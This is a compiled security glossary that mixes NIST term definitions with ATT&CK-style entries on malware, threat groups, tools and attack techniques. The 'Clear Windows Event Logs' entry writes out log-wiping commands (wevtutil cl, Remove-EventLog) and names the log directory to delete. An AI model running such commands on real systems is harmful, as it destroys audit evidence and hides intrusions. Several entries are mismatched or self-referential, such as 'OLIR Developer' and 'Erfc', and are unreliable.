Term: Maple
Definition: An interactive computer algebra system that provides a complete mathematical environment for the manipulation and simplification of symbolic algebraic expressions, arbitrary extended precision mathematics, two- and three-dimensional graphics, and programming.

Term: NIST standards
Definition: Federal Information Processing Standards (FIPS) and NIST Recommendations.

Term: Pharming
Definition: An attack in which an attacker corrupts an infrastructure service such as DNS (Domain Name System) causing the subscriber to be misdirected to a forged verifier/RP, which could cause the subscriber to reveal sensitive information, download harmful software, or contribute to a fraudulent act.

Name: attrib
Type: tool
Description: attrib is a Windows utility used to display, set or remove attributes assigned to files or directories.

Term: authentication protocol
Definition: A defined sequence of messages between a claimant and a verifier that demonstrates that the claimant has possession and control of one or more valid authenticators to establish their identity, and, optionally, demonstrates that the claimant is communicating with the intended verifier.

Term: decode
Definition: Convert encoded data back to its original form of representation.

Term: information system-related security risks
Definition: Risks that arise through the loss of confidentiality, integrity, or availability of information or information systems and consider impacts to the organization (including assets, mission, functions, image, or reputation), individuals, other organizations, and the Nation. See Risk.

Term: countermeasures
Definition: The protective measures prescribed to meet the security requirements (i.e., confidentiality, integrity, and availability) specified for an information system. Safeguards may include security features, management constraints, personnel security, and security of physical structures, areas, and devices. Synonymous with security controls and countermeasures.

Term: Confluent Hypergeometric Function
Definition: The confluent hypergeometric function is defined as
Φ(a;b;z)=(Γ(b))/(Γ(a)Γ(b-a)) ∫_0^1〖e^zt t^(a-1) 〖(1-t)〗^(b-a-1) dt,0<a<b〗

Term: Scenario Test
Definition: Scenario testing is intended to mimic an operational application and simultaneously institute controls on the procedures. Scenario testing requires members of a human test population to transact with biometric sensors.  Scenario tests are appropriate for capturing and assessing the effects of interactions human users have with biometric sensors and interfaces.

Term: IATO
Definition: Interim Authorization to Operate; issued by a DAO to an issuer who is not satisfactorily performing PIV Card and/or Derived PIV Credential specified services (e.g., identity proofing/registration (if applicable)), card/token production, activation/issuance and maintenance).

Term: assessment procedure
Definition: A set of activities or actions employed by an Assessor to determine the extent that an issuer control is implemented.

Name: ifconfig
Type: tool
Description: ifconfig is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system.

Name: DEATHRANSOM
Type: malware
Description: DEATHRANSOM is ransomware written in C that has been used since at least 2020, and has potential overlap with FIVEHANDS and HELLOKITTY.

Term: Escape
Definition: The act of breaking out of a guest OS to gain access to the hypervisor, other guest OSs, or the underlying host OS.

Term: stablecoin
Definition: A cryptocurrency token that is a fungible unit of financial value pegged to a currency, some other asset, or index. It can be traded directly between parties and converted to other currencies or the pegged asset.

Term: checksum
Definition: Value computed on data to detect error or manipulation.

Term: MAC
Definition: A family of secret-key cryptographic algorithms acting on input data of arbitrary length to produce an output value of a specified length (called the MAC of the input data). The MAC can be employed to provide an authentication of the origin of data and/or data-integrity protection. In this Recommendation, approved MAC algorithms are used to determine families of pseudorandom functions (indexed by the choice of key) that are employed during key derivation.

Term: risk management level
Definition: One of three organizational levels defined in NIST SP 800-39: Level 1 (organizational level), Level 2 (mission/business process level), or Level 3(system level).

Term: Desired State
Definition: A defined value, list, or rule (specification) that a) states or b) allows the computation of the state that the organization desires in order to reduce information security risk. Desired state specifications are generally statements of policy.

Term: Cryptographic hash function
Definition: A function that maps a bit string of arbitrary (although bounded) length to a fixed-length bit string. Approved hash functions satisfy the following properties: 1. (One-way) It is computationally infeasible to find any input that maps to any pre-specified output. 2. (Collision-resistant) It is computationally infeasible to find any two distinct inputs that map to the same output.

Term: key
Definition: A value used to control cryptographic operations, such as decryption, encryption, signature generation, or signature verification. For the purposes of these guidelines, key requirements shall meet the minimum requirements stated in Table 2 of NIST SP 800-57 Part 1.
See also Asymmetric Keys, Symmetric Key.

Term: Single Sign-On
Definition: An authentication process by which one account and its authenticators are used to access multiple applications in a seamless manner, generally implemented with a federation protocol.

Term: CCB
Definition: A group of qualified people with responsibility for the process of regulating and approving changes to hardware, firmware, software, and documentation throughout the development and operational life cycle of an information system.

Term: architecture description
Definition: A work product used to express an architecture.

Name: Conficker
Type: malware
Description: Conficker is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread. In 2016, a variant of Conficker made its way on computers and removable disk drives belonging to a nuclear power plant.

Name: SDBbot
Type: malware
Description: SDBbot is a backdoor with installer and loader components that has been used by TA505 since at least 2019.

Term: plaintext
Definition: Information that is not encrypted.

Term: Fresh
Definition: Newly established secret keying material that is statistically independent of any previously established keying material.

Name: Donut
Type: tool
Description: Donut is an open source framework used to generate position-independent shellcode. Donut generated code has been used by multiple threat actors to inject and load malicious payloads into memory.

Term: DRBG Mechanism Boundary
Definition: A conceptual boundary that is used to explain the operations of a DRBG mechanism and its interaction with and relation to other processes. (See min-entropy.)

Term: Mint
Definition: A protocol-level operation that creates and distributes new tokens to blockchain addresses, either individually or in batch.

Term: covert storage channel
Definition: A system feature that enables one system entity to signal information to another entity by directly or indirectly writing to a storage location that is later directly or indirectly read by the second entity.

Term: bit string
Definition: An ordered sequence of 0 and 1 bits.

Term: EOP
Definition: The President's immediate staff, along with entities such as the Office of Management and Budget, the National Security Staff, the Office of Science and Technology Policy, and the Office of Personnel Management.

Term: Duty Cycle
Definition: The percentage of time that a device is operating over a specified period. For example, a reader that is emitting energy to communicate with tags for 15 seconds every minute has a duty cycle of 25%.

Term: Behavior Management
Definition: See Capability, Behavior Management.

Name: Volatile Cedar
Type: intrusion-set
Description: Volatile Cedar is a Lebanese threat group that has targeted individuals, companies, and institutions worldwide. Volatile Cedar has been operating since 2012 and is motivated by political and ideological interests.

Term: secret key
Definition: A cryptographic key that is used by a secret-key (i.e., symmetric) cryptographic algorithm and not made public.

Term: memorized secret
Definition: A string of characters (letters, numbers and other symbols) that are used to authenticate an identity, to verify access authorization or to derive cryptographic keys.

Term: <em>Key specification</em>
Definition: A specification of the data format, cryptographic algorithms, physical media, and data constraints for keys required by a cryptographic device, application or process.

Term: token
Definition: Either information that is only known to the person and the verifier, or a hardware device that can generate information that the verifier knows can only come from that device

Term: memory scavenging
Definition: The collection of residual information from data storage.

Term: Small business
Definition: Small businesses are defined differently depending on the industry sector. For this publication, the definition of a small business includes for-profit, non-profit, and similar organizations with up to 500 employees. Synonymous with “Small Enterprise or Small Organization”. See the SBA website www.sba.gov for more information.

Name: SLOTHFULMEDIA
Type: malware
Description: SLOTHFULMEDIA is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017. It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe. 

In October 2020, Kaspersky Labs assessed SLOTHFULMEDIA is part of an activity cluster it refers to as "IAmTheKing". ESET also noted code similarity between SLOTHFULMEDIA and droppers used by a group it refers to as "PowerPool".

Term: <em>0x</em>
Definition: The marker for the beginning of a hexadecimal representation of a bit string.

Term: data action
Definition: A system/product/service data life cycle operation, including, but not limited to collection, retention, logging, generation, transformation, use, disclosure, sharing, transmission, and disposal.

Term: Benchmark Producer
Definition: A product that generates XCCDF benchmark documents.

Term: message authentication code (MAC)
Definition: A family of symmetric-key cryptographic algorithms that act on input data of arbitrary length to produce an output value of a specified length (i.e., the MAC of the input data). The MAC can be employed to authenticate the origin of the input data and/or provide data integrity protection.

Name: Clear Windows Event Logs
Type: attack-pattern
Description: Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

With administrator privileges, the event logs can be cleared with the following utility commands:

* `wevtutil cl system`
* `wevtutil cl application`
* `wevtutil cl security`

These logs may also be cleared through other mechanisms, such as the event viewer GUI or PowerShell. For example, adversaries may use the PowerShell command `Remove-EventLog -LogName Security` to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.

Adversaries may also attempt to clear logs by directly deleting the stored log files within `C:\Windows\System32\winevt\logs\`.

Term: Hosted virtualization
Definition: A form of full virtualization where the hypervisor runs on top of a host OS.

Term: security function
Definition: Cryptographic algorithms, together with modes of operation (if appropriate); for example, block ciphers, digital signature algorithms, asymmetric key-establishment algorithms, message authentication codes, hash functions, or random bit generators. See FIPS 140.

Term: Pseudorandom
Definition: A process (or data produced by a process) is said to be pseudorandom when the outcome is deterministic yet also appears random as long as the internal action of the process is hidden from observation. For cryptographic purposes, “effectively random” means “computationally indistinguishable from random within the limits of the intended security strength.”

Term: Joint Photographic Experts Group
Definition: A standardized image compression function originally established by the Joint Photographic Experts Group.

Term: verification model
Definition: The synthetic data user is provided with statistics that measure the similarity of the synthetic data result to the same output computed from the confidential data.

Term: operational concept
Definition: See security concept of operations.

Term: application
Definition: the system, functional area, or problem to which information technology isapplied. The application includes related manual procedures as well as automated procedures. Payroll, accounting, and management information systems are examples of applications.

Term: PRA
Definition: A privacy risk management sub-process for identifying and evaluating specific privacy risks.

Term: Agent
Definition: A host-based intrusion prevention system program that monitors and analyzes activity and performs preventive actions; OR a program or plug-in that enables an SSL VPN to access non-Web-based applications and services.

Term: discriminative
Definition: A type of machine learning method that learns to discriminate between classes.

Term: security solution
Definition: The key design, architectural, and implementation choices made by organizations in satisfying specified security requirements for systems or system components.

Name: NotPetya
Type: malware
Description: NotPetya is malware that was used by Sandworm Team in a worldwide attack starting on June 27, 2017. While NotPetya appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, NotPetya may be more appropriately thought of as a form of wiper malware. NotPetya contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.

Term: Security Association (SA)
Definition: A relationship established between two or more entities to enable them to protect data they exchange.

Term: authorize processing
Definition: The right or a permission that is granted to a system entity to access a system resource.

Term: information security architecture
Definition: A description of the structure and behavior for an enterprise’s security processes, information security systems, personnel and organizational sub-units, showing their alignment with the enterprise’s mission and strategic plans.

Term: Asset Tag
Definition: Simple key value attributes that are associated with a platform (e.g., location, company name, division, or department).

Term: OLIR Developer
Definition: The party that develops the entire entropy source or the noise source.

Term: information type
Definition: A specific category of information (e.g., privacy, medical, proprietary, financial, investigative, contractor sensitive, security management) defined by an organization or in some instances, by a specific law, Executive Order, directive, policy, or regulation.

Term: module
Definition: The set of hardware, software, and/or firmware that implements approved security functions (including cryptographic algorithms and key generation) and is contained within the cryptographic boundary.

Name: Starloader
Type: malware
Description: Starloader is a loader component that has been observed loading Felismus and associated tools.

Term: concept crosswalk
Definition: An OLIR that indicates relationships between pairs of elements without additional characterization of those relationships.

Term: KAS2-Party_V-confirmation
Definition: Key-Agreement Scheme 2 with confirmation by party V. Previously known as KAS2-responder-confirmation.

Term: Privacy Control Assessor
Definition: The individual, group, or organization responsible for conducting a security or privacy control assessment.

Name: Video Capture
Type: attack-pattern
Description: An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from Screen Capture due to use of specific devices or applications for video recording rather than capturing the victim's screen.

In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton.

Term: constraints
Definition: Factors that impose restrictions and limitations on the system or actual limitations associated with the use of the system.

Term: Solid-State Drive
Definition: A Solid State Drive (SSD) is a storage device that uses solid state memory to store persistent data.

Term: Operational storage
Definition: The normal storage of operational keying material during the key’s cryptoperiod.

Name: Adversary-in-the-Middle
Type: attack-pattern
Description: Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as Network Sniffing, Transmitted Data Manipulation, or replay attacks (Exploitation for Credential Access). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.

For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware. Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens (Steal Application Access Token) and session cookies (Steal Web Session Cookie). Downgrade Attacks can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.

Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in Transmitted Data Manipulation. Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to impair defenses and/or in support of a Network Denial of Service.

Name: BloodHound
Type: tool
Description: BloodHound is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.

Name: Safe Mode Boot
Type: attack-pattern
Description: Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.

Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.

Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. Modify Registry). Malicious Component Object Model (COM) objects may also be registered and loaded in safe mode.

Term: CSRF
Definition: A type of Web exploit where an unauthorized party causes commands to be transmitted by a trusted user of a Web site without that user’s knowledge.

Term: interface device
Definition: An electronic device that connects an integrated circuit card and the card applications therein to a client application.

Term: adequate security
Definition: security commensurate with the risk and magnitude of the harmresulting from the loss, misuse, or unauthorized access to or modification of information. This includes assuring that systems and applications operate effectively and provide appropriate confidentiality, integrity, and availability, through the use of cost-effective management, acquisition, development, installation, operational, and technical controls.

Term: Fresh
Definition: Newly established keying material is considered to be fresh if the probability of being equal to any previously established keying material is acceptably small. The “acceptably small probability” may be application specific.

Name: Fallback Channels
Type: attack-pattern
Description: Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.

Term: concept of secure function
Definition: A strategy for achievement of secure system function that embodies proactive and reactive protection capability of the system. 
Note 1: This strategy strives to prevent, minimize, or detect the events and conditions that can lead to the loss of an asset and the resultant adverse impact; prevent, minimize, or detect the loss of an asset or adverse asset impact; continuously deliver system capability at some acceptable level despite the impact of threats or uncertainty; and recover from an adverse asset impact to restore full system capability or to recover to some acceptable level of system capability. 
Note 2: The concept of secure function is adapted from historical and other secure system concepts such as Philosophy of Protection, Theory of Design and Operation, and Theory of Compliance.

Term: IS
Definition: A discrete set of information resources organized for the collection, processing, maintenance, use, sharing, dissemination, or disposition of information.
[Note: Information systems also include specialized systems such as industrial/process controls systems, telephone switching and private branch exchange (PBX) systems, and environmental control systems.]

Term: <strong>client</strong>
Definition: a machine or software application that accesses a cloud over a network connection, perhaps on behalf of a consumer; and

Term: malware
Definition: Software or firmware intended to perform an unauthorized process that will have adverse impact on the confidentiality, integrity, or availability of an information system. A virus, worm, Trojan horse, or other code-based entity that infects a host.  Spyware and some forms of adware are also examples of malicious code.

Term: trusted data recipient
Definition: an entity that has limited access to the data that it receives as a result of being bound by some administrative control such as a law, regulation, or data use agreement

Term: URI
Definition: A uniform resource identifier, or URI, is a short string containing a name or address which refers to an object in the "web."

Term: enabling system
Definition: A system that provides support to the life cycle activities associated with the system-of-interest. Enabling systems are not necessarily delivered with the system-of-interest and do not necessarily exist in the operational environment of the system- of-interest.

Term: Specific
Definition: The desired security strength for a digital signature.

Term: capability
Definition: A combination of mutually reinforcing security and/or privacy controls implemented by technical means, physical means, and procedural means. Such controls are typically selected to achieve a common information security- or privacy-related purpose.

Term: Decryption
Definition: The process of a confidentiality mode that transforms encrypted data into the original usable data.

Term: Transaction fee
Definition: An amount of cryptocurrency charged to process a blockchain transaction. Given to publishing nodes to include the transaction within a block.

Term: System Categorization
Definition: The characterization of a manufacturing system, its components, and operations, based on an assessment of the potential impact that a loss of availability, integrity, or confidentiality would have on organizational operations, organizational assets, or individuals.

Term: Key schedule
Definition: The sequence of round keys that are generated from the key by KEYEXPANSION().

Name: Ember Bear
Type: intrusion-set
Description: Ember Bear is a Russian state-sponsored cyber espionage group that has been active since at least 2020, linked to Russia's General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155). Ember Bear has primarily focused operations against Ukrainian government and telecommunication entities, but has also operated against critical infrastructure entities in Europe and the Americas. Ember Bear conducted the WhisperGate destructive wiper attacks against Ukraine in early 2022. There is some confusion as to whether Ember Bear overlaps with another Russian-linked entity referred to as Saint Bear. At present available evidence strongly suggests these are distinct activities with different behavioral profiles.

Name: DownPaper
Type: malware
Description: DownPaper is a backdoor Trojan; its main functionality is to download and run second stage malware.

Term: <em>s</em>
Definition: Security strength in bits.

Term: accuracy
Definition: Closeness of computations or estimates to the exact or true values that the statistics were intended to measure.

Term: Identify-P (Function)
Definition: Develop the organizational understanding to manage privacy risk for individuals arising from data processing.

Term: assertion
Definition: A statement from a Verifier to a Relying Party (RP) that contains identity information about a Subscriber. Assertions may also contain verified attributes.

Term: CC
Definition: A set of internationally accepted semantic tools and constructs for describing the security needs of customers and the security attributes of products.

Term: Uniform Resource Identifier
Definition: A uniform resource identifier, or URI, is a short string containing a name or address which refers to an object in the "web."

Term: Device Cybersecurity Capability
Definition: Cybersecurity features or functions that computing devices provide through their own technical means (i.e., device hardware and software).

Term: Requester
Definition: Generally an individual, process, or device causing information to flow among objects or change to the system state. See object.

Term: Erfc
Definition: See Erfc.

Name: TSCookie
Type: malware
Description: TSCookie is a remote access tool (RAT) that has been used by BlackTech in campaigns against Japanese targets.. TSCookie has been referred to as PLEAD though more recent reporting indicates a separation between the two.

Term: Revoked key notification (RKN)
Definition: A report (e.g., a list) of one or more keys that have been revoked and the date(s) of revocation, possibly along with the reason for their revocation. Certificate Revocation Lists (CRLs) and Compromised Key Lists (CKLs) are examples of RKNs, along with Online Certificate Status Protocol (OCSP) responses (see RFC 6960).

Term: Quarantining
Definition: Storing files containing malware in isolation for future disinfection or examination.

Term: block
Definition: For a given block cipher, a bit string whose length is the block size of the block cipher.

Term: black box testing
Definition: See basic testing.

Term: Conflict resolution
Definition: A predefined method for coming to a consensus on the state of the system. For example, when portions of the system participants claim there is State_A and the rest of the participants claim there is State_B, there is a conflict. The system will automatically resolve this conflict by choosing the “valid” state as being the one from whichever group adds the next block of data. Any transactions “lost” by the state not chosen are added back into the pending transaction pool.

Term: information system-related privacy risks
Definition: Risks that arise from either 1) a breach (privacy context), or 2) as a result of authorized data processing activities that produce a problematic result and reflect the potential adverse impacts to individuals or an organization. Adverse impacts to an organization can include program delays or failures, compliance costs, reputational damage, etc. Adverse impacts to an individual can include the disclosure of private facts, mental pain and emotional distress, potential for blackmail, financial harm, embarrassment, inconvenience, unfairness or unconscious bias, discrimination, loss of trust, etc.

Name: Peripheral Device Discovery
Type: attack-pattern
Description: Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.

Term: S-box
Definition: A non-linear substitution table used in SUBBYTES() and KEYEXPANSION() to perform a one-to-one substitution of a byte value.

Name: Ajax Security Team
Type: intrusion-set
Description: Ajax Security Team is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 Ajax Security Team transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies.

Term: Enrollment
Definition: The process that a CA uses to create a certificate for a web server or email user. (In the context of this practice guide, enrollment applies to the process of a certificate requester requesting a certificate, the CA issuing the certificate, and the requester retrieving the issued certificate.)

Term: Byte String
Definition: A finite, ordered sequence of bytes.

Term: BGP Origin Validation
Definition: BGP Origin Validation specifies a mechanism described in RFC 6811 where a BGP router can verify if a particular prefix was allowed to be announced by the route's originator.

Term: Biometrics
Definition: A measurable physical characteristic or personal behavioral trait used to recognize the identity, or verify the claimed identity, of an applicant. Facial images, fingerprints, and iris scan samples are all examples of biometrics.

Term: ID
Definition: Unique group element&nbsp;<span class="math-tex">\(0\)</span><em>&nbsp;</em>for which&nbsp;<span class="math-tex">\(x+0=x\)</span>&nbsp;for each group element&nbsp;<span class="math-tex">\(x\)</span>, relative to the binary group operator&nbsp;<span class="math-tex">\(+\)</span>.

Term: mandatory access control (MAC)
Definition: See mandatory access control (MAC).

Term: <em>j</em>
Definition: The index to a sequence of data blocks or data segments ordered from left to right.

Name: Chaos
Type: malware
Description: Chaos is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets.

Name: xCmd
Type: tool
Description: xCmd is an open source tool that is similar to PsExec and allows the user to execute applications on remote systems.

Name: QuietSieve
Type: malware
Description: QuietSieve is an information stealer that has been used by Gamaredon Group since at least 2021.

Term: computer network defense (CND)
Definition: Actions taken within protected cyberspace to defeat specific threats that have breached or are threatening to breach cyberspace security measures and include actions to detect, characterize, counter, and mitigate threats, including malware or the unauthorized activities of users, and to restore the system to a secure configuration.

Term: Master key
Definition: As used in this Recommendation, a key that is used during the key-expansion step of a key-derivation procedure to derive the secret output keying material. This key-derivation key is obtained from a shared secret during the randomness-extraction step.

Term: Information System User
Definition: Individual, or (system) process acting on behalf of an individual, authorized to access an information system.
[Note: With respect to SecCM, an information system user is an individual who uses the information system functions, initiates change requests, and assists with functional testing.]

Term: Forced Command
Definition: A restriction configured for an authorized key that prevents executing  commands other than the specified command when logging in using the key. In some SSH implementations, forced command can be configured by using a "command=" restriction in an authorized keys file.

Term: one-way transfer
Definition: Permitting the flow of data to move in one direction only.

Term: structural relationship mapping
Definition: A concept relationship style that captures an inherent hierarchical structure of concepts, usually defined within a single concept source.

Name: Play
Type: intrusion-set
Description: Play is a ransomware group that has been active since at least 2022 deploying Playcrypt ransomware against the business, government, critical infrastructure, healthcare, and media sectors in North America, South America, and Europe. Play actors employ a double-extortion model, encrypting systems after exfiltrating data, and are presumed by security researchers to operate as a closed group.

Name: Clear Mailbox Data
Type: attack-pattern
Description: Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. 

Adversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of Phishing/Internal Spearphishing, Email Collection, Mail Protocols for command and control, or email-based exfiltration such as Exfiltration Over Alternative Protocol. For example, to remove evidence on Exchange servers adversaries have used the <code>ExchangePowerShell</code> PowerShell module, including <code>Remove-MailboxExportRequest</code> to remove evidence of mailbox exports. On Linux and macOS, adversaries may also delete emails through a command line utility called <code>mail</code> or use AppleScript to interact with APIs on macOS.

Adversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.

Term: information system-related security risks
Definition: Risk that arises through the loss of confidentiality, integrity, or availability of information or information systems considering impacts to organizational operations and assets, individuals, other organizations, and the Nation.

Term: Key-recovery agent
Definition: A human entity authorized to access stored key information in key backups and archives.

Term: MFA
Definition: Authentication using two or more different factors to achieve authentication. Factors include something you know (e.g., PIN, password), something you have (e.g., cryptographic identification device, token), or something you are (e.g., biometric). See authenticator.

Term: Data Processing Ecosystem
Definition: The complex and interconnected relationships among entities involved in creating or deploying systems, products, or services or any components that process data.

Term: Bias
Definition: With respect to the uniform distribution on&nbsp;<span class="math-tex">\([0,n-1]\)</span>, the bias is defined to be the maximum value of&nbsp;<span class="math-tex">\(\{probability(S) - (\frac{|S|}{n})\}\)</span>&nbsp;taken over all subsets&nbsp;<span class="math-tex">\(S\)</span><em>&nbsp;</em>of&nbsp;<span class="math-tex">\([0,n-1]\)</span>. This measures the maximum advantage that an adversary has in predicting any event.

Term: chain
Definition: Two or more assessment elements that are linked by a common aspect of ISCM. Each chain has an assessment element in Program Step 1, DEFINE, called the root, which has no predecessor or parent element.

Term: host-based intrusion detection and prevention system
Definition: A program that monitors the characteristics of a single host and the events occurring within that host to identify and stop suspicious activity.

Term: information steward
Definition: Individual or group that helps to ensure the careful and responsible management of federal information belonging to the Nation as a whole, regardless of the entity or source that may have originated, created, or compiled the information. Information stewards provide maximum access to federal information to elements of the federal government and its customers, balanced by the obligation to protect the information in accordance with the provisions of the Federal Information Security Management Act (FISMA) and any associated security-related federal policies, directives, regulations, standards, and guidance.

Name: FoggyWeb
Type: malware
Description: FoggyWeb is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by APT29 since at least early April 2021.

Name: P.A.S. Webshell
Type: malware
Description: P.A.S. Webshell is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.

Term: memorized secret
Definition: A string of characters (letters, numbers and other symbols) that are used to authenticate an identity, verify access authorization or derive cryptographic keys.

Term: Taxonomy
Definition: A scheme of classification.

Term: access list
Definition: Roster of individuals authorized admittance to a controlled area.

Term: comprehensive testing
Definition: See Comprehensive Testing.

Term: Registration authority (RA)
Definition: A trusted entity that establishes and vouches for the identity and authorization of a certificate applicant on behalf of some authority (e.g., a CA).

Term: availability
Definition: Ensuring timely and reliable access to and use of information.

Term: protection needs
Definition: Informal statement or expression of the stakeholder security requirements focused on protecting information, systems, and services associated with mission/business functions throughout the system life cycle.
Note: Requirements elicitation and security analyses transform the protection needs into a formalized statement of stakeholder security requirements that are managed as part of the validated stakeholder requirements baseline.

Term: PED
Definition: An electronic device used in a debit, credit, or smart card-based transaction to accept and encrypt the cardholder's personal identification number.

Term: key establishment
Definition: A function in the lifecycle of keying material; the process by which cryptographic keys are securely established among cryptographic modules using manual transport methods (e.g., key loaders), automated methods (e.g., key-transport and/or key-agreement protocols), or a combination of automated and manual methods (consists of key transport plus key agreement).

Term: Security Authorization
Definition: The official management decision given by a senior official to authorize operation of a system or the common controls inherited by designated organizations systems and to explicitly accept the risk to organizational operations (including mission, functions, image, and reputation), organizational assets, individuals, other organizations, and the Nation based on the implementation of an agreed-upon set of security and privacy controls. Also known as authorization to operate.

Term: concern
Definition: Matter of interest or importance to a stakeholder.

Term: Automated Certificate Management Environment
Definition: A protocol defined in IETF RFC 8555 that provides for the automated enrollment of certificates.

Term: Concatenation
Definition: The concatenation of bit strings <i>X</i> and <i>Y</i>.

Term: Integrated Digital Enhanced Network (iDEN)
Definition: A proprietary mobile communications technology developed by Motorola that combines the capabilities of a digital cellular telephone with two-way radio.

Name: Defacement
Type: attack-pattern
Description: Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.

Term: Command Authority
Definition: The command authority is responsible for the appointment of user representatives for a department, agency, or organization and their key and granting of modern (electronic) key ordering privileges for those User Representatives.

Term: key
Definition: A numerical value used to control cryptographic operations, such as decryption, encryption, signature generation, or signature verification. Usually a sequence of random or pseudorandom bits used initially to set up and periodically change the operations performed in cryptographic equipment for the purpose of encrypting or decrypting electronic signals, or for determining electronic counter-countermeasures (ECCM) patterns, or for producing other key.

Term: firewall
Definition: A firewall is a device that has a network protection application installed to safeguard the network from intentional or unintentional intrusion. A firewall sits at the junction point or gateway between the two networks, usually a private network and a public network such as the Internet. The term “firewall” is derived from the process in which, by segmenting a network into different physical subnetworks, the firewalls limit damage that could spread from one subnet to another, acting in the same manner as fire doors or firewalls in automobiles.

Term: Total Risk
Definition: the potential for the occurrence of an adverse event if no mitigating action istaken (i.e., the potential for any applicable threat to exploit a system vulnerability). (See Acceptable Risk, Residual Risk, and Minimum Level of Protection.)

Term: approved cryptography
Definition: Federal Information Processing Standard (FIPS)-approved or NIST recommended. An algorithm or technique that is either 1) specified in a FIPS or NIST Recommendation, or 2) adopted in a FIPS or NIST Recommendation.

Term: anonymized data
Definition: data from which the patient cannot be identified by the recipient of the information

Term: Implementation
Definition: An implementation of an RBG is a cryptographic device or portion of a cryptographic device that is the physical embodiment of the RBG design, for example, some code running on a computing platform.

Term: ATO
Definition: The official management decision issued by a designated accrediting authority (DAA) or principal accrediting authority (PAA) to authorize operation of an information system and to explicitly accept the residual risk to agency operations (including mission, functions, image, or reputation), agency assets, or individuals.

Name: BendyBear
Type: malware
Description: BendyBear is an x64 shellcode for a stage-zero implant designed to download malware from a C2 server. First discovered in August 2020, BendyBear shares a variety of features with Waterbear, malware previously attributed to the Chinese cyber espionage group BlackTech.

Term: Risk Adaptive (Adaptable) Access Control
Definition: In RAdAC, access privileges are granted based on a combination of a user’s identity, mission need, and the level of security risk that exists between the system being accessed and a user. RAdAC will use security metrics, such as the strength of the authentication method, the level of assurance of the session connection between the system and a user, and the physical location of a user, to make its risk determination.

Term: assurance
Definition: Grounds for justified confidence that a claim has been or will be achieved.

Term: allowlist
Definition: A documented list of specific elements that are allowed, per policy decision. In federation contexts, this is most commonly used to refer to the list of RPs that are allowed to connect to an IdP without subscriber intervention. This concept has historically been known as a whitelist.

Term: DNP3
Definition: DNP3 Distributed Network Protocol (published as IEEE 1815)

Name: Login Items
Type: attack-pattern
Description: Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in. Login items can be added via a shared file list or Service Management Framework. Shared file list login items can be set using scripting languages such as AppleScript, whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.

